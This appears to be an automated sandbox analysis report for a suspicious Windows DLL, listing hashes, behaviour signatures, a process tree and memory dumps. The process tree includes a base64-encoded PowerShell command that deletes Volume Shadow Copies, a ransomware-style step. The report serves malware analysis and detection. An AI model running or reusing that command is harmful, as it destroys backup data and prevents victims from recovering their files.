Analysis

  • max time kernel
    118s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:50

General

  • Target

    e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll

  • Size

    166KB

  • MD5

    3c21e050abbd6da896d238b7bd126523

  • SHA1

    b90139797ae74d60bc4b7e184383d4beb60c685d

  • SHA256

    e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3

  • SHA512

    7d763a1a441958670c5b5e0ca0d18d1f70926cdfcaabaf41857663ce94e5e0e141ce538a0a3bb080edb5fd9f0ffccd6dccf9cdcd3891dbe76b6029b7fc384cf8

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:576
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1004
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1788

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/576-56-0x000007FEFBE21000-0x000007FEFBE23000-memory.dmp
      Filesize

      8KB

    • memory/576-58-0x00000000023B0000-0x00000000023B2000-memory.dmp
      Filesize

      8KB

    • memory/576-59-0x00000000023B2000-0x00000000023B4000-memory.dmp
      Filesize

      8KB

    • memory/576-60-0x00000000023B4000-0x00000000023B7000-memory.dmp
      Filesize

      12KB

    • memory/576-57-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp
      Filesize

      11.4MB

    • memory/576-61-0x00000000023BB000-0x00000000023DA000-memory.dmp
      Filesize

      124KB

    • memory/1716-55-0x0000000076731000-0x0000000076733000-memory.dmp
      Filesize

      8KB